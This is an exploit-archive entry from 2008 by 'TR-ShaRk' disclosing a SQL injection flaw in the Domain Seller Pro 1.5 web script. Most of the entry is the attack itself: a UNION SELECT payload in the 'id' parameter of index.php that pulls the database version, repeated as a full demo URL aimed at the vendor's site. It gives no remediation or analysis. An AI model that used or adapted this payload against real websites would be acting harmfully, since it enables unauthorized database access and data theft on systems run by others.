id: 4124
date: 11/07/2008
title: Domain Seller Pro 1.5 (id) Remote SQL Injection Vulnerability
author: TR-ShaRk
cves: 

=============================================================
Domain Seller Pro 1.5 (id) Remote SQL Injection Vulnerability
=============================================================


######################################
#
#   Author : TR-ShaRk
#
######################
#
#   Web    : StarHack.Us OldKral.Com
#            
######################
#
#   Script   : Domain Seller Pro? v1.5
#
######################
#
#   SQL Injection Vuln. :
#
#   index.php?a=d&id=-4+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
#
######################
#
#   Demo   :

http://www.domainsellerpro.com/demo/index.php?a=d&id=-4+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
#
#
#  
#########################################




#  0day.today [2023-03-26]  #